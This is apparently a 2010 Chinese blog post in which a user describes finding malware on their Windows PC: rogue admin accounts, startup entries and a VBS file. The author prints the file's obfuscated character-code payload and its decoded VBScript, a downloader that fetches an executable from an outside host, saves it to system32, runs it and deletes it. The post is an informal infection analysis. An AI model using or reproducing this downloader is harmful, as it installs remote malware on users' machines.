电脑中毒了了解一点VBS相关知识

今天无意中发现自己电脑中毒了,每次开机都会发现自己的Administrator的帐号没有开机显示,而且被创建了两个莫名其妙的管理员帐号,很是郁闷,通过查看启动项(MSCONFIG) 发现。多了几个可疑的启动项,在启动项里多了什么  C:\WINDOWS\system32\

http1.vbs 通过文件打开是这样一段代码: (13,83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,13,10,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,108,101,49,57,46,51,51,50,50,46,111,114,103,47,50,46,101,120,101,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,50,48,48,48,48,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,41,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,48,13,10,115,101,116,32,102,115,111,61,99,114,101,97,116,101,111,98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103,46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99,116,34,41,13,10,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,32,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,41,13,10)

没看的懂,先是删除了启动项,重启发现还是不行,打开注册表(regedit)查找该启动项删掉注册表之后打开HTTP1.VBS发现通过C#程序重新编译该段代码打出excute 的内容: runner
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://le19.3322.org/2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\windows\system32\놦즽쓐럢1433.exe",2
wscript.sleep 20000
Shell.Run ("c:\windows\system32\놦즽쓐럢1433.exe")
wscript.sleep 10000
set fso=createobject("scripting.filesystemobject")
fso.DeleteFile( "c:\windows\system32\놦즽쓐럢1433.exe")

这样就一目了然了的知道了这段VBS到底想干吗了。希望把这些全部删除后能有效,最大的问题是不知道病毒文件놦즽쓐럢1433.exe 内执行了,什么东西。希望不会对我的电脑造成太大的影响。

总结:中毒的方法,浏览网站+加载执行病毒文件+下载VBS文件+加入启动项+加入注册表+执行病毒文件+(造成计算机故障)+删除病毒文件。

posted @ 2010-10-05 11:42  NewSoftsNet  Views(437)  Comments(0Edit  收藏  举报